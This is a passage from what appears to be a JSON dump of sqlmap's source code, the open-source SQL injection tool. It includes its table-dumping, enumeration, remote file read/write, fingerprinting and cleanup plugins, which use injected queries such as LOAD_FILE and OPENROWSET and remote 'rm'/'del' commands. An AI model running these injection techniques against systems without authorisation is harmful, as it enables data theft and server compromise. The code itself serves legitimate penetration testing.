index)\n                                    elif Backend.getIdentifiedDbms() in (DBMS.MIMERSQL,):\n                                        query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else (\"%s.%s\" % (conf.db.upper(), tbl.upper())), sorted(colList, key=len)[0], index)\n                                    elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.EXTREMEDB):\n                                        query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index)\n                                    elif Backend.isDbms(DBMS.FIREBIRD):\n                                        query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl)\n                                    elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):\n                                        query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0])\n                                    elif Backend.isDbms(DBMS.FRONTBASE):\n                                        query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl)\n                                    else:\n                                        query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, tbl, index)\n\n                                    query = agent.whereQuery(query)\n\n                                    value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)\n                                    value = '' if value is None else value\n\n                                    lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))\n                                    entries[column].append(value)\n\n                        except KeyboardInterrupt:\n                            kb.dumpKeyboardInterrupt = True\n                            clearConsoleLine()\n                            warnMsg = \"Ctrl+C detected in dumping phase\"\n                            logger.warning(warnMsg)\n\n                    for column, columnEntries in entries.items():\n                        length = max(lengths[column], len(column))\n\n                        kb.data.dumpedTable[column] = {\"length\": length, \"values\": columnEntries}\n\n                        entriesCount = len(columnEntries)\n\n                if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag):\n                    warnMsg = \"unable to retrieve the entries \"\n                    if conf.col:\n                        warnMsg += \"of columns '%s' \" % colNames\n                    warnMsg += \"for table '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n                    warnMsg += \"in database '%s'%s\" % (unsafeSQLIdentificatorNaming(conf.db), \" (permission denied)\" if kb.permissionFlag else \"\")\n                    logger.warning(warnMsg)\n                else:\n                    kb.data.dumpedTable[\"__infos__\"] = {\"count\": entriesCount,\n                                                        \"table\": safeSQLIdentificatorNaming(tbl, True),\n                                                        \"db\": safeSQLIdentificatorNaming(conf.db)}\n                    try:\n                        attackDumpedTable()\n                    except (IOError, OSError) as ex:\n                        errMsg = \"an error occurred while attacking \"\n                        errMsg += \"table dump ('%s')\" % getSafeExString(ex)\n                        logger.critical(errMsg)\n                    conf.dumper.dbTableValues(kb.data.dumpedTable)\n\n            except SqlmapConnectionException as ex:\n                errMsg = \"connection exception detected in dumping phase \"\n                errMsg += \"('%s')\" % getSafeExString(ex)\n                logger.critical(errMsg)\n\n            finally:\n                kb.dumpColumns = None\n                kb.dumpTable = None\n\n    def dumpAll(self):\n        if conf.db is not None and conf.tbl is None:\n            self.dumpTable()\n            return\n\n        if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n            errMsg = \"information_schema not available, \"\n            errMsg += \"back-end DBMS is MySQL < 5.0\"\n            raise SqlmapUnsupportedFeatureException(errMsg)\n\n        infoMsg = \"sqlmap will dump entries of all tables from all databases now\"\n        logger.info(infoMsg)\n\n        conf.tbl = None\n        conf.col = None\n\n        self.getTables()\n\n        if kb.data.cachedTables:\n            if isinstance(kb.data.cachedTables, list):\n                kb.data.cachedTables = {None: kb.data.cachedTables}\n\n            for db, tables in kb.data.cachedTables.items():\n                conf.db = db\n\n                for table in tables:\n                    if conf.exclude and re.search(conf.exclude, table, re.I) is not None:\n                        infoMsg = \"skipping table '%s'\" % unsafeSQLIdentificatorNaming(table)\n                        logger.info(infoMsg)\n                        continue\n\n                    try:\n                        conf.tbl = table\n                        kb.data.cachedColumns = {}\n                        kb.data.dumpedTable = {}\n\n                        self.dumpTable()\n                    except SqlmapNoneDataException:\n                        infoMsg = \"skipping table '%s'\" % unsafeSQLIdentificatorNaming(table)\n                        logger.info(infoMsg)\n\n    def dumpFoundColumn(self, dbs, foundCols, colConsider):\n        message = \"do you want to dump found column(s) entries? [Y/n] \"\n\n        if not readInput(message, default='Y', boolean=True):\n            return\n\n        dumpFromDbs = []\n        message = \"which database(s)?\\n[a]ll (default)\\n\"\n\n        for db, tblData in dbs.items():\n            if tblData:\n                message += \"[%s]\\n\" % unsafeSQLIdentificatorNaming(db)\n\n        message += \"[q]uit\"\n        choice = readInput(message, default='a')\n\n        if not choice or choice in ('a', 'A'):\n            dumpFromDbs = list(dbs.keys())\n        elif choice in ('q', 'Q'):\n            return\n        else:\n            dumpFromDbs = choice.replace(\" \", \"\").split(',')\n\n        for db, tblData in dbs.items():\n            if db not in dumpFromDbs or not tblData:\n                continue\n\n            conf.db = db\n            dumpFromTbls = []\n            message = \"which table(s) of database '%s'?\\n\" % unsafeSQLIdentificatorNaming(db)\n            message += \"[a]ll (default)\\n\"\n\n            for tbl in tblData:\n                message += \"[%s]\\n\" % tbl\n\n            message += \"[s]kip\\n\"\n            message += \"[q]uit\"\n            choice = readInput(message, default='a')\n\n            if not choice or choice in ('a', 'A'):\n                dumpFromTbls = tblData\n            elif choice in ('s', 'S'):\n                continue\n            elif choice in ('q', 'Q'):\n                return\n            else:\n                dumpFromTbls = choice.replace(\" \", \"\").split(',')\n\n            for table, columns in tblData.items():\n                if table not in dumpFromTbls:\n                    continue\n\n                conf.tbl = table\n                colList = [_ for _ in columns if _]\n\n                if conf.exclude:\n                    colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]\n\n                conf.col = ','.join(colList)\n                kb.data.cachedColumns = {}\n                kb.data.dumpedTable = {}\n\n                data = self.dumpTable(dbs)\n\n                if data:\n                    conf.dumper.dbTableValues(data)\n\n    def dumpFoundTables(self, tables):\n        message = \"do you want to dump found table(s) entries? [Y/n] \"\n\n        if not readInput(message, default='Y', boolean=True):\n            return\n\n        dumpFromDbs = []\n        message = \"which database(s)?\\n[a]ll (default)\\n\"\n\n        for db, tablesList in tables.items():\n            if tablesList:\n                message += \"[%s]\\n\" % unsafeSQLIdentificatorNaming(db)\n\n        message += \"[q]uit\"\n        choice = readInput(message, default='a')\n\n        if not choice or choice.lower() == 'a':\n            dumpFromDbs = list(tables.keys())\n        elif choice.lower() == 'q':\n            return\n        else:\n            dumpFromDbs = choice.replace(\" \", \"\").split(',')\n\n        for db, tablesList in tables.items():\n            if db not in dumpFromDbs or not tablesList:\n                continue\n\n            conf.db = db\n            dumpFromTbls = []\n            message = \"which table(s) of database '%s'?\\n\" % unsafeSQLIdentificatorNaming(db)\n            message += \"[a]ll (default)\\n\"\n\n            for tbl in tablesList:\n                message += \"[%s]\\n\" % unsafeSQLIdentificatorNaming(tbl)\n\n            message += \"[s]kip\\n\"\n            message += \"[q]uit\"\n            choice = readInput(message, default='a')\n\n            if not choice or choice.lower() == 'a':\n                dumpFromTbls = tablesList\n            elif choice.lower() == 's':\n                continue\n            elif choice.lower() == 'q':\n                return\n            else:\n                dumpFromTbls = choice.replace(\" \", \"\").split(',')\n\n            for table in dumpFromTbls:\n                conf.tbl = table\n                kb.data.cachedColumns = {}\n                kb.data.dumpedTable = {}\n\n                data = self.dumpTable()\n\n                if data:\n                    conf.dumper.dbTableValues(data)\n"
  },
  {
    "path": "sqlmap/plugins/generic/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setOs\nfrom lib.parse.banner import bannerParser\nfrom lib.request import inject\nfrom plugins.generic.custom import Custom\nfrom plugins.generic.databases import Databases\nfrom plugins.generic.entries import Entries\nfrom plugins.generic.search import Search\nfrom plugins.generic.users import Users\n\nclass Enumeration(Custom, Databases, Entries, Search, Users):\n    \"\"\"\n    This class defines generic enumeration functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        kb.data.has_information_schema = False\n        kb.data.banner = None\n        kb.data.hostname = \"\"\n        kb.data.processChar = None\n\n        Custom.__init__(self)\n        Databases.__init__(self)\n        Entries.__init__(self)\n        Search.__init__(self)\n        Users.__init__(self)\n\n    def getBanner(self):\n        if not conf.getBanner:\n            return\n\n        if kb.data.banner is None:\n            infoMsg = \"fetching banner\"\n            logger.info(infoMsg)\n\n            if Backend.isDbms(DBMS.DB2):\n                rootQuery = queries[DBMS.DB2].banner\n                for query in (rootQuery.query, rootQuery.query2):\n                    kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=False))\n                    if kb.data.banner:\n                        break\n            else:\n                query = queries[Backend.getIdentifiedDbms()].banner.query\n                kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=False))\n\n            bannerParser(kb.data.banner)\n\n            if conf.os and conf.os == \"windows\":\n                kb.bannerFp[\"type\"] = set([\"Windows\"])\n\n            elif conf.os and conf.os == \"linux\":\n                kb.bannerFp[\"type\"] = set([\"Linux\"])\n\n            elif conf.os:\n                kb.bannerFp[\"type\"] = set([\"%s%s\" % (conf.os[0].upper(), conf.os[1:])])\n\n            if conf.os:\n                setOs()\n\n        return kb.data.banner\n\n    def getHostname(self):\n        infoMsg = \"fetching server hostname\"\n        logger.info(infoMsg)\n\n        query = queries[Backend.getIdentifiedDbms()].hostname.query\n\n        if not kb.data.hostname:\n            kb.data.hostname = unArrayizeValue(inject.getValue(query, safeCharEncode=False))\n\n        return kb.data.hostname\n"
  },
  {
    "path": "sqlmap/plugins/generic/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport codecs\nimport os\nimport sys\n\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import checkFile\nfrom lib.core.common import dataToOutFile\nfrom lib.core.common import decloakToTemp\nfrom lib.core.common import decodeDbmsHexValue\nfrom lib.core.common import isListLike\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isStackingAvailable\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import readInput\nfrom lib.core.compat import xrange\nfrom lib.core.convert import encodeBase64\nfrom lib.core.convert import encodeHex\nfrom lib.core.convert import getText\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapUndefinedMethod\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.request import inject\n\nclass Filesystem(object):\n    \"\"\"\n    This class defines generic OS file system functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        self.fileTblName = \"%sfile\" % conf.tablePrefix\n        self.tblField = \"data\"\n\n    def _checkFileLength(self, localFile, remoteFile, fileRead=False):\n        if Backend.isDbms(DBMS.MYSQL):\n            lengthQuery = \"LENGTH(LOAD_FILE('%s'))\" % remoteFile\n\n        elif Backend.isDbms(DBMS.PGSQL) and not fileRead:\n            lengthQuery = \"SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d\" % self.oid\n\n        elif Backend.isDbms(DBMS.MSSQL):\n            self.createSupportTbl(self.fileTblName, self.tblField, \"VARBINARY(MAX)\")\n            inject.goStacked(\"INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)\" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField))\n\n            lengthQuery = \"SELECT DATALENGTH(%s) FROM %s\" % (self.tblField, self.fileTblName)\n\n        try:\n            localFileSize = os.path.getsize(localFile)\n        except OSError:\n            warnMsg = \"file '%s' is missing\" % localFile\n            logger.warning(warnMsg)\n            localFileSize = 0\n\n        if fileRead and Backend.isDbms(DBMS.PGSQL):\n            logger.info(\"length of read file '%s' cannot be checked on PostgreSQL\" % remoteFile)\n            sameFile = True\n        else:\n            logger.debug(\"checking the length of the remote file '%s'\" % remoteFile)\n            remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n            sameFile = None\n\n            if isNumPosStrValue(remoteFileSize):\n                remoteFileSize = int(remoteFileSize)\n                localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)\n                sameFile = False\n\n                if localFileSize == remoteFileSize:\n                    sameFile = True\n                    infoMsg = \"the local file '%s' and the remote file \" % localFile\n                    infoMsg += \"'%s' have the same size (%d B)\" % (remoteFile, localFileSize)\n                elif remoteFileSize > localFileSize:\n                    infoMsg = \"the remote file '%s' is larger (%d B) than \" % (remoteFile, remoteFileSize)\n                    infoMsg += \"the local file '%s' (%dB)\" % (localFile, localFileSize)\n                else:\n                    infoMsg = \"the remote file '%s' is smaller (%d B) than \" % (remoteFile, remoteFileSize)\n                    infoMsg += \"file '%s' (%d B)\" % (localFile, localFileSize)\n\n                logger.info(infoMsg)\n            else:\n                sameFile = False\n                warnMsg = \"it looks like the file has not been written (usually \"\n                warnMsg += \"occurs if the DBMS process user has no write \"\n                warnMsg += \"privileges in the destination path)\"\n                logger.warning(warnMsg)\n\n        return sameFile\n\n    def fileToSqlQueries(self, fcEncodedList):\n        \"\"\"\n        Called by MySQL and PostgreSQL plugins to write a file on the\n        back-end DBMS underlying file system\n        \"\"\"\n\n        counter = 0\n        sqlQueries = []\n\n        for fcEncodedLine in fcEncodedList:\n            if counter == 0:\n                sqlQueries.append(\"INSERT INTO %s(%s) VALUES (%s)\" % (self.fileTblName, self.tblField, fcEncodedLine))\n            else:\n                updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine)\n                sqlQueries.append(\"UPDATE %s SET %s=%s\" % (self.fileTblName, self.tblField, updatedField))\n\n            counter += 1\n\n        return sqlQueries\n\n    def fileEncode(self, fileName, encoding, single, chunkSize=256):\n        \"\"\"\n        Called by MySQL and PostgreSQL plugins to write a file on the\n        back-end DBMS underlying file system\n        \"\"\"\n\n        checkFile(fileName)\n\n        with open(fileName, \"rb\") as f:\n            content = f.read()\n\n        return self.fileContentEncode(content, encoding, single, chunkSize)\n\n    def fileContentEncode(self, content, encoding, single, chunkSize=256):\n        retVal = []\n\n        if encoding == \"hex\":\n            content = encodeHex(content)\n        elif encoding == \"base64\":\n            content = encodeBase64(content)\n        else:\n            content = codecs.encode(content, encoding)\n\n        content = getText(content).replace(\"\\n\", \"\")\n\n        if not single:\n            if len(content) > chunkSize:\n                for i in xrange(0, len(content), chunkSize):\n                    _ = content[i:i + chunkSize]\n\n                    if encoding == \"hex\":\n                        _ = \"0x%s\" % _\n                    elif encoding == \"base64\":\n                        _ = \"'%s'\" % _\n\n                    retVal.append(_)\n\n        if not retVal:\n            if encoding == \"hex\":\n                content = \"0x%s\" % content\n            elif encoding == \"base64\":\n                content = \"'%s'\" % content\n\n            retVal = [content]\n\n        return retVal\n\n    def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):\n        choice = None\n\n        if forceCheck is not True:\n            message = \"do you want confirmation that the local file '%s' \" % localFile\n            message += \"has been successfully written on the back-end DBMS \"\n            message += \"file system ('%s')? [Y/n] \" % remoteFile\n            choice = readInput(message, default='Y', boolean=True)\n\n        if forceCheck or choice:\n            return self._checkFileLength(localFile, remoteFile)\n\n        return True\n\n    def askCheckReadFile(self, localFile, remoteFile):\n        if not kb.bruteMode:\n            message = \"do you want confirmation that the remote file '%s' \" % remoteFile\n            message += \"has been successfully downloaded from the back-end \"\n            message += \"DBMS file system? [Y/n] \"\n\n            if readInput(message, default='Y', boolean=True):\n                return self._checkFileLength(localFile, remoteFile, True)\n\n        return None\n\n    def nonStackedReadFile(self, remoteFile):\n        errMsg = \"'nonStackedReadFile' method must be defined \"\n        errMsg += \"into the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def stackedReadFile(self, remoteFile):\n        errMsg = \"'stackedReadFile' method must be defined \"\n        errMsg += \"into the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):\n        errMsg = \"'unionWriteFile' method must be defined \"\n        errMsg += \"into the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):\n        errMsg = \"'stackedWriteFile' method must be defined \"\n        errMsg += \"into the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def readFile(self, remoteFile):\n        localFilePaths = []\n\n        self.checkDbmsOs()\n\n        for remoteFile in remoteFile.split(','):\n            fileContent = None\n            kb.fileReadMode = True\n\n            if conf.direct or isStackingAvailable():\n                if isStackingAvailable():\n                    debugMsg = \"going to read the file with stacked query SQL \"\n                    debugMsg += \"injection technique\"\n                    logger.debug(debugMsg)\n\n                fileContent = self.stackedReadFile(remoteFile)\n            elif Backend.isDbms(DBMS.MYSQL):\n                debugMsg = \"going to read the file with a non-stacked query \"\n                debugMsg += \"SQL injection technique\"\n                logger.debug(debugMsg)\n\n                fileContent = self.nonStackedReadFile(remoteFile)\n            else:\n                errMsg = \"none of the SQL injection techniques detected can \"\n                errMsg += \"be used to read files from the underlying file \"\n                errMsg += \"system of the back-end %s server\" % Backend.getDbms()\n                logger.error(errMsg)\n\n                fileContent = None\n\n            kb.fileReadMode = False\n\n            if fileContent in (None, \"\") and not Backend.isDbms(DBMS.PGSQL):\n                self.cleanup(onlyFileTbl=True)\n            elif isListLike(fileContent):\n                newFileContent = \"\"\n\n                for chunk in fileContent:\n                    if isListLike(chunk):\n                        if len(chunk) > 0:\n                            chunk = chunk[0]\n                        else:\n                            chunk = \"\"\n\n                    if chunk:\n                        newFileContent += chunk\n\n                fileContent = newFileContent\n\n            if fileContent is not None:\n                fileContent = decodeDbmsHexValue(fileContent, True)\n\n                if fileContent.strip():\n                    localFilePath = dataToOutFile(remoteFile, fileContent)\n\n                    if not Backend.isDbms(DBMS.PGSQL):\n                        self.cleanup(onlyFileTbl=True)\n\n                    sameFile = self.askCheckReadFile(localFilePath, remoteFile)\n\n                    if sameFile is True:\n                        localFilePath += \" (same file)\"\n                    elif sameFile is False:\n                        localFilePath += \" (size differs from remote file)\"\n\n                    localFilePaths.append(localFilePath)\n                elif not kb.bruteMode:\n                    errMsg = \"no data retrieved\"\n                    logger.error(errMsg)\n\n        return localFilePaths\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        written = False\n\n        checkFile(localFile)\n\n        self.checkDbmsOs()\n\n        if localFile.endswith('_'):\n            localFile = getUnicode(decloakToTemp(localFile))\n\n        if conf.direct or isStackingAvailable():\n            if isStackingAvailable():\n                debugMsg = \"going to upload the file '%s' with \" % fileType\n                debugMsg += \"stacked query technique\"\n                logger.debug(debugMsg)\n\n            written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)\n            self.cleanup(onlyFileTbl=True)\n        elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):\n            debugMsg = \"going to upload the file '%s' with \" % fileType\n            debugMsg += \"UNION query technique\"\n            logger.debug(debugMsg)\n\n            written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)\n        elif Backend.isDbms(DBMS.MYSQL):\n            debugMsg = \"going to upload the file '%s' with \" % fileType\n            debugMsg += \"LINES TERMINATED BY technique\"\n            logger.debug(debugMsg)\n\n            written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck)\n        else:\n            errMsg = \"none of the SQL injection techniques detected can \"\n            errMsg += \"be used to write files to the underlying file \"\n            errMsg += \"system of the back-end %s server\" % Backend.getDbms()\n            logger.error(errMsg)\n\n            return None\n\n        return written\n"
  },
  {
    "path": "sqlmap/plugins/generic/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import readInput\nfrom lib.core.data import logger\nfrom lib.core.enums import OS\nfrom lib.core.exception import SqlmapUndefinedMethod\n\nclass Fingerprint(object):\n    \"\"\"\n    This class defines generic fingerprint functionalities for plugins.\n    \"\"\"\n\n    def __init__(self, dbms):\n        Backend.forceDbms(dbms)\n\n    def getFingerprint(self):\n        errMsg = \"'getFingerprint' method must be defined \"\n        errMsg += \"into the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def checkDbms(self):\n        errMsg = \"'checkDbms' method must be defined \"\n        errMsg += \"into the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def checkDbmsOs(self, detailed=False):\n        errMsg = \"'checkDbmsOs' method must be defined \"\n        errMsg += \"into the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def forceDbmsEnum(self):\n        pass\n\n    def userChooseDbmsOs(self):\n        warnMsg = \"for some reason sqlmap was unable to fingerprint \"\n        warnMsg += \"the back-end DBMS operating system\"\n        logger.warning(warnMsg)\n\n        msg = \"do you want to provide the OS? [(W)indows/(l)inux]\"\n\n        while True:\n            os = readInput(msg, default='W').upper()\n\n            if os == 'W':\n                Backend.setOs(OS.WINDOWS)\n                break\n            elif os == 'L':\n                Backend.setOs(OS.LINUX)\n                break\n            else:\n                warnMsg = \"invalid value\"\n                logger.warning(warnMsg)\n"
  },
  {
    "path": "sqlmap/plugins/generic/misc.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport ntpath\nimport re\n\nfrom lib.core.common import Backend\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import isStackingAvailable\nfrom lib.core.common import normalizePath\nfrom lib.core.common import ntToPosixSlashes\nfrom lib.core.common import posixToNtSlashes\nfrom lib.core.common import readInput\nfrom lib.core.common import singleTimeDebugMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import OS\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.request import inject\n\nclass Miscellaneous(object):\n    \"\"\"\n    This class defines miscellaneous functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    def getRemoteTempPath(self):\n        if not conf.tmpPath and Backend.isDbms(DBMS.MSSQL):\n            debugMsg = \"identifying Microsoft SQL Server error log directory \"\n            debugMsg += \"that sqlmap will use to store temporary files with \"\n            debugMsg += \"commands' output\"\n            logger.debug(debugMsg)\n\n            _ = unArrayizeValue(inject.getValue(\"SELECT SERVERPROPERTY('ErrorLogFileName')\", safeCharEncode=False))\n\n            if _:\n                conf.tmpPath = ntpath.dirname(_)\n\n        if not conf.tmpPath:\n            if Backend.isOs(OS.WINDOWS):\n                if conf.direct:\n                    conf.tmpPath = \"%TEMP%\"\n                else:\n                    self.checkDbmsOs(detailed=True)\n\n                    if Backend.getOsVersion() in (\"2000\", \"NT\"):\n                        conf.tmpPath = \"C:/WINNT/Temp\"\n                    elif Backend.isOs(\"XP\"):\n                        conf.tmpPath = \"C:/Documents and Settings/All Users/Application Data/Temp\"\n                    else:\n                        conf.tmpPath = \"C:/Windows/Temp\"\n            else:\n                conf.tmpPath = \"/tmp\"\n\n        if re.search(r\"\\A[\\w]:[\\/\\\\]+\", conf.tmpPath, re.I):\n            Backend.setOs(OS.WINDOWS)\n\n        conf.tmpPath = normalizePath(conf.tmpPath)\n        conf.tmpPath = ntToPosixSlashes(conf.tmpPath)\n\n        singleTimeDebugMessage(\"going to use '%s' as temporary files directory\" % conf.tmpPath)\n\n        hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath)\n\n        return conf.tmpPath\n\n    def getVersionFromBanner(self):\n        if \"dbmsVersion\" in kb.bannerFp:\n            return\n\n        infoMsg = \"detecting back-end DBMS version from its banner\"\n        logger.info(infoMsg)\n\n        query = queries[Backend.getIdentifiedDbms()].banner.query\n\n        if conf.direct:\n            query = \"SELECT %s\" % query\n\n        kb.bannerFp[\"dbmsVersion\"] = unArrayizeValue(inject.getValue(query)) or \"\"\n\n        match = re.search(r\"\\d[\\d.-]*\", kb.bannerFp[\"dbmsVersion\"])\n        if match:\n            kb.bannerFp[\"dbmsVersion\"] = match.group(0)\n\n    def delRemoteFile(self, filename):\n        if not filename:\n            return\n\n        self.checkDbmsOs()\n\n        if Backend.isOs(OS.WINDOWS):\n            filename = posixToNtSlashes(filename)\n            cmd = \"del /F /Q %s\" % filename\n        else:\n            cmd = \"rm -f %s\" % filename\n\n        self.execCmd(cmd, silent=True)\n\n    def createSupportTbl(self, tblName, tblField, tblType):\n        inject.goStacked(\"DROP TABLE %s\" % tblName, silent=True)\n\n        if Backend.isDbms(DBMS.MSSQL) and tblName == self.cmdTblName:\n            inject.goStacked(\"CREATE TABLE %s(id INT PRIMARY KEY IDENTITY, %s %s)\" % (tblName, tblField, tblType))\n        else:\n            inject.goStacked(\"CREATE TABLE %s(%s %s)\" % (tblName, tblField, tblType))\n\n    def cleanup(self, onlyFileTbl=False, udfDict=None, web=False):\n        \"\"\"\n        Cleanup file system and database from sqlmap create files, tables\n        and functions\n        \"\"\"\n\n        if web and self.webBackdoorFilePath:\n            logger.info(\"cleaning up the web files uploaded\")\n\n            self.delRemoteFile(self.webStagerFilePath)\n            self.delRemoteFile(self.webBackdoorFilePath)\n\n        if (not isStackingAvailable() or kb.udfFail) and not conf.direct:\n            return\n\n        if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest:\n            return\n\n        if Backend.isOs(OS.WINDOWS):\n            libtype = \"dynamic-link library\"\n\n        elif Backend.isOs(OS.LINUX):\n            libtype = \"shared object\"\n\n        else:\n            libtype = \"shared library\"\n\n        if onlyFileTbl:\n            logger.debug(\"cleaning up the database management system\")\n        else:\n            logger.info(\"cleaning up the database management system\")\n\n        logger.debug(\"removing support tables\")\n        inject.goStacked(\"DROP TABLE %s\" % self.fileTblName, silent=True)\n        inject.goStacked(\"DROP TABLE %shex\" % self.fileTblName, silent=True)\n\n        if not onlyFileTbl:\n            inject.goStacked(\"DROP TABLE %s\" % self.cmdTblName, silent=True)\n\n            if Backend.isDbms(DBMS.MSSQL):\n                udfDict = {\"master..new_xp_cmdshell\": {}}\n\n            if udfDict is None:\n                udfDict = getattr(self, \"sysUdfs\", {})\n\n            for udf, inpRet in udfDict.items():\n                message = \"do you want to remove UDF '%s'? [Y/n] \" % udf\n\n                if readInput(message, default='Y', boolean=True):\n                    dropStr = \"DROP FUNCTION %s\" % udf\n\n                    if Backend.isDbms(DBMS.PGSQL):\n                        inp = \", \".join(i for i in inpRet[\"input\"])\n                        dropStr += \"(%s)\" % inp\n\n                    logger.debug(\"removing UDF '%s'\" % udf)\n                    inject.goStacked(dropStr, silent=True)\n\n            logger.info(\"database management system cleanup finished\")\n\n            warnMsg = \"remember that UDF %s files \" % libtype\n\n            if conf.osPwn:\n                warnMsg += \"and Metasploit related files in the temporary \"\n                warnMsg += \"folder \"\n\n            warnMsg += \"saved on the file system can only be deleted \"\n            warnMsg += \"manually\"\n            logger.warning(warnMsg)\n\n    def likeOrExact(self, what):\n        message = \"do you want sqlmap to consider provided %s(s):\\n\" % what\n        message += \"[1] as LIKE %s names (default)\\n\" % what\n        message += \"[2] as exact %s names\" % what\n\n        choice = readInput(message, default='1')\n\n        if not choice or choice == '1':\n            choice = '1'\n            condParam = \" LIKE '%%%s%%'\"\n        elif choice == '2':\n            condParam = \"='%s'\"\n        else:\n            errMsg = \"invalid value\"\n            raise SqlmapNoneDataException(errMsg)\n\n        return choice, condParam\n"
  },
  {
    "path": "sqlmap/plugins/generic/search.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.agent import agent\nfrom lib.core.common import arrayizeValue\nfrom lib.core.common import Backend\nfrom lib.core.common import filterPairValues\nfrom lib.core.common import getLimitRange\nfrom lib.core.common import isInferenceAvailable\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import readInput\nfrom lib.core.common import safeSQLIdentificatorNaming\nfrom lib.core.common import safeStringFormat\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.data import queries\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import CURRENT_DB\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.core.settings import UPPER_CASE_DBMSES\nfrom lib.request import inject\nfrom lib.utils.brute import 